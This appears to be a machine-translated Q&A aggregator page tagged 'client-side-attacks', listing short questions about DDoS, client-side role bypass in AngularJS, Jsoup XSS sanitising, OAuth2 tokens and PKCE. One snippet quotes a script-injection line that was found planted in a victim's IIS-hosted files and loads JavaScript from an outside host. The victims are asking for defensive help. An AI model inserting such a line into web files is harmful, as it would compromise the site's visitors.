client-side-attacks

    2热度

    1回答

    我想托管一台Web服务器,但我的方式存在一些问题:DDoS攻击。我对托管一台Web服务器很陌生,最近我刚刚发现了它们。我可能是错的,但我知道当机器人向服务器发送请求时,他们不会向服务器返回答案,所以服务器会尝试一次又一次地发送机器人想要的文件。有没有办法让服务器返回文件5次,如果客户端“doesent获取”该文件,第6次服务器doesent再次返回文件到该客户端? 我很抱歉,如果问题或标题有点混乱

    0热度

    1回答

    我们有angularjs应用,我们有相关的用户不同的角色调试代码在JavaScript。例如:这两个角色是管理员和本地。根据角色,我们为管理员显示一些菜单项,并向管理员添加更多功能/屏幕。 与管理属性的用户信息从登录响应中返回,并根据我们的决定,所有的菜单和屏幕来呈现。 但是,如果我们的用户开发工具,在使用管理员属性设置断点,并设置管理员属性为true的用户即使他是本地用户将能够访问管理员权限。

    1热度

    1回答

    我想使用Jsoup在我的Java应用程序中从XSS攻击中清除一些HTML字符串。 但我想也有<a>和<img>标签。 这个库可以吗?

    2热度

    1回答

    我生成oauth2访问并刷新令牌并将它们存储在我的数据库中。我使用UUID v4生成这些令牌并删除破折号。我曾经在过期后删除令牌,但现在我将它们全部存储起来,因为我想到了可能发生的事情。 如果攻击者在本地存储了为其生成的所有访问令牌并且他一再使用这些访问令牌进行授权,该怎么办?由于我作为数据库管理员正在删除生成的令牌,因此数据库无法知道令牌是否唯一。因此,如果UUIDv4算法生成一个不同的用户的访

    0热度

    1回答

    我在我的IIS服务器中有很多javascript和html文件。几天前,一些奇怪的代码注入到文件中。下面的代码。 /*ec8243*/ document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>'); /*/ec8243*/

    0热度

    1回答

    我正在通过auth 2.0协议[1],以及证明密钥RFC [2]。它很好地解释了协议如何防止恶意应用程序监听网络流量。但是,我无法理解auth 2.0协议如何防止恶意代码在浏览器本身上工作。 我们来看一个简单的证明密钥RFC协议的例子。我们生成一个高熵代码验证器,但我们必须将它存储在浏览器的某个地方(可能在cookie /浏览器的本地存储器中),以便再次使用它来获取令牌。现在,如果在浏览器上执行恶